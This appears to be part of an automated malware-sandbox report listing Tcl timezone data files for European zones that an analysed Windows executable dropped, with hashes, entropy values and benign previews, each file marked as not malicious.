                                                                                                                                                                                                                              SHA-256:1402A2072ADC9EBB35F4C0368D2E9A7A11493626C667C022614FFB7CC05B6CB6
                                                                                                                                                                                                                              SHA-512:8B1B47678F75DBE59DB08E034F0701BD11FF4FD3AD0304C8ABF45E848F717D2787B8E47558D3C334D369E0938C633DC217178D3EAE6486CEFBE25CF1668479F6
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Brussels) {.. {-9223372036854775808 1050 0 LMT}.. {-2840141850 1050 0 BMT}.. {-2450995200 0 0 WET}.. {-1740355200 3600 0 CET}.. {-1693702800 7200 0 CEST}.. {-1680483600 3600 0 CET}.. {-1663455600 7200 1 CEST}.. {-1650150000 3600 0 CET}.. {-1632006000 7200 1 CEST}.. {-1618700400 3600 0 CET}.. {-1613826000 0 0 WET}.. {-1604278800 3600 1 WEST}.. {-1585530000 0 0 WET}.. {-1574038800 3600 1 WEST}.. {-1552266000 0 0 WET}.. {-1539997200 3600 1 WEST}.. {-1520557200 0 0 WET}.. {-1507510800 3600 1 WEST}.. {-1490576400 0 0 WET}.. {-1473642000 3600 1 WEST}.. {-1459126800 0 0 WET}.. {-1444006800 3600 1 WEST}.. {-1427677200 0 0 WET}.. {-1411952400 3600 1 WEST}.. {-1396227600 0 0 WET}.. {-1379293200 3600 1 WEST}.. {-1364778000 0 0 WET}.. {-1348448400 3600 1 WEST}.. {-1333328400 0 0 WET}.. {-1316394000 3600 1 WEST}.. {-1301263200 0 0 WET}.. {
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7974
                                                                                                                                                                                                                              Entropy (8bit):3.7264631277913853
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:vMSsQMAz5CXNU5paNlKkUpvBeRF+iDlKSdkwSMTHkB2vwz59F06Kgr/y/rYjlBK0:vMS1kdUoivBeRF+W35Syrwl9h5j
                                                                                                                                                                                                                              MD5:88DB5686937D3499A8142413B2CF2EB5
                                                                                                                                                                                                                              SHA1:E37BAD2127553600D0E38A43053D1B07B2498DA8
                                                                                                                                                                                                                              SHA-256:C560D45104A8DD73FC7370B5AC1615E22043DBC93DFB46A9ECC6468C2D38B19A
                                                                                                                                                                                                                              SHA-512:375B8A63CFF2E278CD8C78BF9DBC86288FFB1AD57DAED00CD2199F0B05F4FBFA7D17D93C6458B20B86F6D05F3E3A49D594E60AC97DDB47141E21D7CDE10F8456
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Bucharest) {.. {-9223372036854775808 6264 0 LMT}.. {-2469404664 6264 0 BMT}.. {-1213148664 7200 0 EET}.. {-1187056800 10800 1 EEST}.. {-1175479200 7200 0 EET}.. {-1159754400 10800 1 EEST}.. {-1144029600 7200 0 EET}.. {-1127700000 10800 1 EEST}.. {-1111975200 7200 0 EET}.. {-1096250400 10800 1 EEST}.. {-1080525600 7200 0 EET}.. {-1064800800 10800 1 EEST}.. {-1049076000 7200 0 EET}.. {-1033351200 10800 1 EEST}.. {-1017626400 7200 0 EET}.. {-1001901600 10800 1 EEST}.. {-986176800 7200 0 EET}.. {-970452000 10800 1 EEST}.. {-954727200 7200 0 EET}.. {296604000 10800 1 EEST}.. {307486800 7200 0 EET}.. {323816400 10800 1 EEST}.. {338940000 7200 0 EET}.. {354672000 10800 0 EEST}.. {370396800 7200 0 EET}.. {386121600 10800 1 EEST}.. {401846400 7200 0 EET}.. {417571200 10800 1 EEST}.. {433296000 7200 0 EET}.. {449020800 10800 1 EEST}.. {465
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8287
                                                                                                                                                                                                                              Entropy (8bit):3.8244305880244567
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:rHw0+D5xp4elPiIEtzsFpMbFNBwA3ybuNTjrjBDmE0DmiTcoYdNOMCsyZhltlUxo:rQXj41sFpM5vwA6Efv03TBZLl
                                                                                                                                                                                                                              MD5:11468F958796F971ADD5FB1A0C426D78
                                                                                                                                                                                                                              SHA1:3FA58BEF391BCF7BAC6A124D093B6505B4EAC452
                                                                                                                                                                                                                              SHA-256:B58F3E9066B8B57EB037D509636AA67A06ACC8348BE6C48482D87CDC49844A4E
                                                                                                                                                                                                                              SHA-512:0492EABD6EE16392C00A196AF38995E5F9E55E30A82A50EFFB381DC978E9E63E801555CDC219869E6251BD51115972F742D8A7D9524372B8B11702AE4B28BFB7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Budapest) {.. {-9223372036854775808 4580 0 LMT}.. {-2498260580 3600 0 CET}.. {-1693706400 7200 1 CEST}.. {-1680483600 3600 0 CET}.. {-1663455600 7200 1 CEST}.. {-1650150000 3600 0 CET}.. {-1640998800 3600 0 CET}.. {-1632006000 7200 1 CEST}.. {-1618700400 3600 0 CET}.. {-1600470000 7200 1 CEST}.. {-1587250800 3600 0 CET}.. {-1569711600 7200 1 CEST}.. {-1555196400 3600 0 CET}.. {-906775200 3600 0 CET}.. {-857257200 3600 0 CET}.. {-844556400 7200 1 CEST}.. {-828226800 3600 0 CET}.. {-812502000 7200 1 CEST}.. {-796777200 3600 0 CET}.. {-788922000 3600 0 CET}.. {-778471200 7200 1 CEST}.. {-762656400 3600 0 CET}.. {-749689200 7200 1 CEST}.. {-733276800 3600 0 CET}.. {-717634800 7200 1 CEST}.. {-701910000 3600 0 CET}.. {-686185200 7200 1 CEST}.. {-670460400 3600 0 CET}.. {-654130800 7200 1 CEST}.. {-639010800 3600 0 CET}.. {-492656400 7
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):183
                                                                                                                                                                                                                              Entropy (8bit):4.952483060656419
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxVnCMPfXHAIgoqkCM4ARL/yQahDZALMFB5h8Qa5CMS:SlSWB9vsM3ym5XPHAIgo5gAN/y7D17/f
                                                                                                                                                                                                                              MD5:CED145F8D9B231234E021D2214C1064B
                                                                                                                                                                                                                              SHA1:7B111DC24CA01C78A382CECD3247CF495D71CD34
                                                                                                                                                                                                                              SHA-256:F511A80AB70FF93A0EB9F29293F73DF952B773BB33EB85D581E4FB1FE06E4F05
                                                                                                                                                                                                                              SHA-512:E2323C04BF99909ABA9A09A66F9B4696519B5F9FE3AF178FB04D5E0053F41CAA8B937DC4148954ED093D317F454E0547786BEC934F2ABF22A60AAA6A24E63BF9
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Zurich)]} {.. LoadTimeZoneFile Europe/Zurich..}..set TZData(:Europe/Busingen) $TZData(:Europe/Zurich)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8096
                                                                                                                                                                                                                              Entropy (8bit):3.7635458172251406
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:jXSsijEpkv2XkN8qc/OyEie8hF5WQ9VX/Zs1cw27oXqdCA5XqjqFLigTE9s5VpJ:jXS+WeUqKie8hF5f9PwdXM9
                                                                                                                                                                                                                              MD5:E7F52393523729CA3916768B3F3B4E55
                                                                                                                                                                                                                              SHA1:1524A3E610DCD33AC0006946BAB2929CA7F5A33F
                                                                                                                                                                                                                              SHA-256:2BD1C0AB412A5E9C97F533C4D06B773D045215B92568A4E89ADC93C7462D62EC
                                                                                                                                                                                                                              SHA-512:218674ECD9FD6C1A1C83EE69AFE6AA5AD0D5A8BB59FF497FDF2573B7CF52DAE98ECE0815CF99668CA4E172FF67D220B227369865076333B3EE802A8839C65279
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Chisinau) {.. {-9223372036854775808 6920 0 LMT}.. {-2840147720 6900 0 CMT}.. {-1637114100 6264 0 BMT}.. {-1213148664 7200 0 EET}.. {-1187056800 10800 1 EEST}.. {-1175479200 7200 0 EET}.. {-1159754400 10800 1 EEST}.. {-1144029600 7200 0 EET}.. {-1127700000 10800 1 EEST}.. {-1111975200 7200 0 EET}.. {-1096250400 10800 1 EEST}.. {-1080525600 7200 0 EET}.. {-1064800800 10800 1 EEST}.. {-1049076000 7200 0 EET}.. {-1033351200 10800 1 EEST}.. {-1017626400 7200 0 EET}.. {-1001901600 10800 1 EEST}.. {-986176800 7200 0 EET}.. {-970452000 10800 1 EEST}.. {-954727200 7200 0 EET}.. {-927165600 10800 1 EEST}.. {-898138800 7200 0 CET}.. {-857257200 3600 0 CET}.. {-844556400 7200 1 CEST}.. {-828226800 3600 0 CET}.. {-812502000 7200 1 CEST}.. {-800154000 10800 0 MSD}.. {354920400 14400 1 MSD}.. {370728000 10800 0 MSK}.. {386456400 14400 1 MSD}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):185
                                                                                                                                                                                                                              Entropy (8bit):4.925156646979837
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxV/y+YF3vXHAIgoq8yFRRL/yQagKVihh8Qahyuv:SlSWB9vsM3ymhVoPHAIgoh6N/yy87Fv
                                                                                                                                                                                                                              MD5:3AEDE4B340D0250D496C49CADBA04E62
                                                                                                                                                                                                                              SHA1:C466D8275C465752F5B024615268F6D1CBBA4B41
                                                                                                                                                                                                                              SHA-256:2B9A0F1775355E311FB63903E3829F98B5F6C73C08F1BECE1A2D471ACC2673E3
                                                                                                                                                                                                                              SHA-512:2B08B57D58699C65A9AAA43AC87F29DD1EDCBA9F91E79DF4B1E07832032F5B03A43847E20345484730E8D2323199E7439D8C1FC662E812E8BA6EE19C53C89681
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Berlin)]} {.. LoadTimeZoneFile Europe/Berlin..}..set TZData(:Europe/Copenhagen) $TZData(:Europe/Berlin)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):9810
                                                                                                                                                                                                                              Entropy (8bit):3.7678769652077873
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:sExxHZiMU8EKTy74jT56XdEN1+UZBdMN186LPR:sEzZiMUZ6y0jT5bZHMN186LPR
                                                                                                                                                                                                                              MD5:E1EB426EA3351AF0D7D563006F9146BC
                                                                                                                                                                                                                              SHA1:1E94F3B38366FE43BB031A57D19894B569EBABED
                                                                                                                                                                                                                              SHA-256:895957521D6CA4DE7E4089DC587A6C177B803D8ADF63303B1F85DEB279726324
                                                                                                                                                                                                                              SHA-512:8F24E9519F5D42F34AEE5C52A94CAC7D035EAE7B31DC3E629C29CFE3BD85F1510188290D35CD327492A030168443FED8BD80EC57ED27811B786C4DC89B4B1181
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Dublin) {.. {-9223372036854775808 -1521 0 LMT}.. {-2821649679 -1521 0 DMT}.. {-1691962479 2079 1 IST}.. {-1680471279 0 0 GMT}.. {-1664143200 3600 1 BST}.. {-1650146400 0 0 GMT}.. {-1633903200 3600 1 BST}.. {-1617487200 0 0 GMT}.. {-1601848800 3600 1 BST}.. {-1586037600 0 0 GMT}.. {-1570399200 3600 1 BST}.. {-1552168800 0 0 GMT}.. {-1538344800 3600 1 BST}.. {-1522533600 0 0 GMT}.. {-1517011200 0 0 IST}.. {-1507500000 3600 1 IST}.. {-1490565600 0 0 IST}.. {-1473631200 3600 1 IST}.. {-1460930400 0 0 IST}.. {-1442786400 3600 1 IST}.. {-1428876000 0 0 IST}.. {-1410732000 3600 1 IST}.. {-1396216800 0 0 IST}.. {-1379282400 3600 1 IST}.. {-1364767200 0 0 IST}.. {-1348437600 3600 1 IST}.. {-1333317600 0 0 IST}.. {-1315778400 3600 1 IST}.. {-1301263200 0 0 IST}.. {-1284328800 3600 1 IST}.. {-1269813600 0 0 IST}.. {-1253484000 3600 1 IST
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):9509
                                                                                                                                                                                                                              Entropy (8bit):3.8837074152297704
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:QTOKVA1oCobz0W4x2+ZE74elPiIEtzsFpMbFNBwA3ybuNTjrjBDmE0DmiTcoYdNA:QyoCvTZ641sFpM5vwA6Efv03TBZLl
                                                                                                                                                                                                                              MD5:D04F8EDDA1C3611692FB91E317CCADFE
                                                                                                                                                                                                                              SHA1:1C483FC95459EC6F1D5FE4DD275879A9EBCA1718
                                                                                                                                                                                                                              SHA-256:0524A31131405347C1D5D86C5EE38A2064AB055C030AB3B43F25DB3B28FFD8D2
                                                                                                                                                                                                                              SHA-512:4E2E18EBDE2765F2251B1FE41EF8E6AC79875617348974A28619F5E59EC0467239C682CCE8DEBD7A698BE2F00252C77D1F7FA50B6CAFF920B3BE53A0B836F815
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Gibraltar) {.. {-9223372036854775808 -1284 0 LMT}.. {-2821649916 0 0 GMT}.. {-1691964000 3600 1 BST}.. {-1680472800 0 0 GMT}.. {-1664143200 3600 1 BST}.. {-1650146400 0 0 GMT}.. {-1633903200 3600 1 BST}.. {-1617487200 0 0 GMT}.. {-1601848800 3600 1 BST}.. {-1586037600 0 0 GMT}.. {-1570399200 3600 1 BST}.. {-1552168800 0 0 GMT}.. {-1538344800 3600 1 BST}.. {-1522533600 0 0 GMT}.. {-1507500000 3600 1 BST}.. {-1490565600 0 0 GMT}.. {-1473631200 3600 1 BST}.. {-1460930400 0 0 GMT}.. {-1442786400 3600 1 BST}.. {-1428876000 0 0 GMT}.. {-1410732000 3600 1 BST}.. {-1396216800 0 0 GMT}.. {-1379282400 3600 1 BST}.. {-1364767200 0 0 GMT}.. {-1348437600 3600 1 BST}.. {-1333317600 0 0 GMT}.. {-1315778400 3600 1 BST}.. {-1301263200 0 0 GMT}.. {-1284328800 3600 1 BST}.. {-1269813600 0 0 GMT}.. {-1253484000 3600 1 BST}.. {-1238364000 0 0 GMT}
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):183
                                                                                                                                                                                                                              Entropy (8bit):4.879252060643389
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxVxKL823vXHAIgoqyKL8H6RL/yQakQAL/yQavKL81n:SlSWB9vsM3ymvKA2PHAIgovKAH6N/yYU
                                                                                                                                                                                                                              MD5:07AF23DA01CB963EA9E57534E34E7704
                                                                                                                                                                                                                              SHA1:1C4A214FF3B722E80C0ECACA0FFD5DFF302F6AE9
                                                                                                                                                                                                                              SHA-256:F7046808A8E80B7AE449D1A49AE3E480096736B7D3F554A240C7DFB10F82076A
                                                                                                                                                                                                                              SHA-512:713860D340C0EBA5EEF873ECB9B28CCDE9BFAD31B6A8626EF507E96585F5CC1091BF8D8A2DB7E5CB532E44F4561FBAE1797141724EF934755B69919FEA09A78A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/London)]} {.. LoadTimeZoneFile Europe/London..}..set TZData(:Europe/Guernsey) $TZData(:Europe/London)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7368
                                                                                                                                                                                                                              Entropy (8bit):3.7258352536809705
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:OsR0uO7DVopaNlKkUpvBeRF+iDlKSdkwSMTHkB2vwz59F06Kgr/y/rYjlBKb0hzj:OkyDjivBeRF+W35Syrwl9h5j
                                                                                                                                                                                                                              MD5:7FF902B06FA79F14553670A70E77FF8C
                                                                                                                                                                                                                              SHA1:0105051541F38956EA6192BD0C7ED4047668005E
                                                                                                                                                                                                                              SHA-256:5B5C0A9261A414EA8DC34F594EE05BEE16F695488B230857D2B569A6B603BC39
                                                                                                                                                                                                                              SHA-512:551940199783A0FF9D73695B77B10300644F50E91D6B02FE79BB0CD4B78C7BA88CCE56F4B9408EC146361BF408F52D01A1F435183360C801EA5E219FB718247F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Helsinki) {.. {-9223372036854775808 5989 0 LMT}.. {-2890258789 5989 0 HMT}.. {-1535938789 7200 0 EET}.. {-875671200 10800 1 EEST}.. {-859773600 7200 0 EET}.. {354672000 10800 1 EEST}.. {370396800 7200 0 EET}.. {386121600 10800 1 EEST}.. {401846400 7200 0 EET}.. {410220000 7200 0 EET}.. {417574800 10800 1 EEST}.. {433299600 7200 0 EET}.. {449024400 10800 1 EEST}.. {465354000 7200 0 EET}.. {481078800 10800 1 EEST}.. {496803600 7200 0 EET}.. {512528400 10800 1 EEST}.. {528253200 7200 0 EET}.. {543978000 10800 1 EEST}.. {559702800 7200 0 EET}.. {575427600 10800 1 EEST}.. {591152400 7200 0 EET}.. {606877200 10800 1 EEST}.. {622602000 7200 0 EET}.. {638326800 10800 1 EEST}.. {654656400 7200 0 EET}.. {670381200 10800 1 EEST}.. {686106000 7200 0 EET}.. {701830800 10800 1 EEST}.. {717555600 7200 0 EET}.. {733280400 10800 1 EEST}.. {749
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):186
                                                                                                                                                                                                                              Entropy (8bit):4.914274131294981
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxVxKL823vXHAIgoqyKL8H6RL/yQaqpfioxp8QavKLS:SlSWB9vsM3ymvKA2PHAIgovKAH6N/ycS
                                                                                                                                                                                                                              MD5:F9A0F19FAF3131D8A70C50FF21B365B7
                                                                                                                                                                                                                              SHA1:7FC2B5302FAD06BC4C633CD22A80A7D40073FFF8
                                                                                                                                                                                                                              SHA-256:2F1151B0528A5325443379D4E7CCE32C00213722AD9DF764E1DC90198084B076
                                                                                                                                                                                                                              SHA-512:6D04DF4480FE132A6641C4BF7E01936E2E4A71A3A6C2AB9F7DA7A9D8A4B836BC66EE2BB597B8C318D07A06F72C05B07E6785B53308ED9BC1103AE6DBDD0FF24E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/London)]} {.. LoadTimeZoneFile Europe/London..}..set TZData(:Europe/Isle_of_Man) $TZData(:Europe/London)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3683
                                                                                                                                                                                                                              Entropy (8bit):3.814835316757376
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:Qi0p05zvSPBUUl0ZFzo4ay0CREDcxn6nH78BV0QbCgkCPviiM0H7hdli80+j7x9L:Qiq66OFEIFMssCfMsXV3heM2MRlA0
                                                                                                                                                                                                                              MD5:A8256656B971F58CB991BC270BF93B26
                                                                                                                                                                                                                              SHA1:189796E1B8E29A7A7B8B0E143DD9B44BAF217AB2
                                                                                                                                                                                                                              SHA-256:08061A80FC0F1EF375EEFE784EACDF0812E289FD67E8613BDEC36209985CA1D7
                                                                                                                                                                                                                              SHA-512:1F11308B5BAC1F3DB75CAC7322BBEA6E51C6B4A2A3450F1DB84DE6AA127F0F1BAA7DAB409FAF1288C100BDA77DA6FA1C6E3C0BA962F9406D1445D7C9E2AA3A60
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Istanbul) {.. {-9223372036854775808 6952 0 LMT}.. {-2840147752 7016 0 IMT}.. {-1869875816 7200 0 EET}.. {-1693706400 10800 1 EEST}.. {-1680490800 7200 0 EET}.. {-1570413600 10800 1 EEST}.. {-1552186800 7200 0 EET}.. {-1538359200 10800 1 EEST}.. {-1522551600 7200 0 EET}.. {-1507514400 10800 1 EEST}.. {-1490583600 7200 0 EET}.. {-1440208800 10800 1 EEST}.. {-1428030000 7200 0 EET}.. {-1409709600 10800 1 EEST}.. {-1396494000 7200 0 EET}.. {-931053600 10800 1 EEST}.. {-922676400 7200 0 EET}.. {-917834400 10800 1 EEST}.. {-892436400 7200 0 EET}.. {-875844000 10800 1 EEST}.. {-764737200 7200 0 EET}.. {-744343200 10800 1 EEST}.. {-733806000 7200 0 EET}.. {-716436000 10800 1 EEST}.. {-701924400 7200 0 EET}.. {-684986400 10800 1 EEST}.. {-670474800 7200 0 EET}.. {-654141600 10800 1 EEST}.. {-639025200 7200 0 EET}.. {-622087200 10800 1 EEST}.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):181
                                                                                                                                                                                                                              Entropy (8bit):4.8801202136140915
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxVxKL823vXHAIgoqyKL8H6RL/yQap6cEBx/yQavKLS:SlSWB9vsM3ymvKA2PHAIgovKAH6N/yzx
                                                                                                                                                                                                                              MD5:FE10770868A75F4F8D76C5E23D99AA81
                                                                                                                                                                                                                              SHA1:30AC768BA47AF7A53831F5142B58ECEC41933621
                                                                                                                                                                                                                              SHA-256:97EB33915ED7C9C34144F8F42357FAB2262B3CD45287F3CFFD26C33D65F7651E
                                                                                                                                                                                                                              SHA-512:1D82DF45AB0CCDFBFAD0431C668794996E01776800F34DD4131C5287D37291657A749D497AA5B0AB81CAFF3190896633FBFF456BFFEB7E93A3420AA841E54842
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/London)]} {.. LoadTimeZoneFile Europe/London..}..set TZData(:Europe/Jersey) $TZData(:Europe/London)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2512
                                                                                                                                                                                                                              Entropy (8bit):3.941165221943348
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:coNlj+X2uxhuHJkw0QqXknzaVV04v3TfdGY3kNmneVuNlh000sGpdh:coN9+1EpkwCXkSV3A8qc0
                                                                                                                                                                                                                              MD5:104CCB93300F40BAF8F4D7CC882EFC05
                                                                                                                                                                                                                              SHA1:EA83F3C3791BD6F083844939DC405B248E738FE3
                                                                                                                                                                                                                              SHA-256:2387D26DF5429DF9867F42F7D4F872DC146643B4B3CC57DA7298C18561DE8BFE
                                                                                                                                                                                                                              SHA-512:12724C5BBEE0835626A98B66BF55C3DF1311F07018C70D76FC5C50E7E7BA5C4A9F064D9EDC376CC3B06C4FFFECA3FAF5B66948615A03DFECA7C361E326D950EA
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Kaliningrad) {.. {-9223372036854775808 4920 0 LMT}.. {-2422056120 3600 0 CET}.. {-1693706400 7200 1 CEST}.. {-1680483600 3600 0 CET}.. {-1663455600 7200 1 CEST}.. {-1650150000 3600 0 CET}.. {-1632006000 7200 1 CEST}.. {-1618700400 3600 0 CET}.. {-938905200 7200 1 CEST}.. {-857257200 3600 0 CET}.. {-844556400 7200 1 CEST}.. {-828226800 3600 0 CET}.. {-812502000 7200 1 CEST}.. {-796777200 3600 0 CET}.. {-781052400 7200 1 CEST}.. {-780368400 7200 0 EET}.. {-778730400 10800 1 EEST}.. {-762663600 7200 0 EET}.. {-749095200 10800 0 MSD}.. {354920400 14400 1 MSD}.. {370728000 10800 0 MSK}.. {386456400 14400 1 MSD}.. {402264000 10800 0 MSK}.. {417992400 14400 1 MSD}.. {433800000 10800 0 MSK}.. {449614800 14400 1 MSD}.. {465346800 10800 0 MSK}.. {481071600 14400 1 MSD}.. {496796400 10800 0 MSK}.. {512521200 14400 1 MSD}.. {528246000 10800
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):173
                                                                                                                                                                                                                              Entropy (8bit):4.970386708540243
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxV2cvXHAIgoq1csFARL/yQaoM2EBUQaocqn:SlSWB9vsM3ym5HAIgoiAN/yOEBUC
                                                                                                                                                                                                                              MD5:74ACF46A3248341CFD84B1592F884A8F
                                                                                                                                                                                                                              SHA1:888FBB54381A1B5BC19E65AF38A1913635A8E7E4
                                                                                                                                                                                                                              SHA-256:05C55F87182F0D5D3E8E6C1F9164EDDBDB8035146A0955C04283BC1347D45B30
                                                                                                                                                                                                                              SHA-512:21A752390E023CBD582BC43865D43458B44B036299A2373948269196071742ED7EB6067DD9A288F3A15E808B452FE4192750FAE813F70738FAB0C866219D57CB
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Kyiv)]} {.. LoadTimeZoneFile Europe/Kyiv..}..set TZData(:Europe/Kiev) $TZData(:Europe/Kyiv)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2029
                                                                                                                                                                                                                              Entropy (8bit):3.668326642402654
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:FFvCAs6kKR6aQmF1cSNWrI+AjXgV/Ap40FjDM:FhCAs6kC6aZF1cSN4I+AjXgV/ApDFjDM
                                                                                                                                                                                                                              MD5:57BB199152815B12FE4491C92FE25186
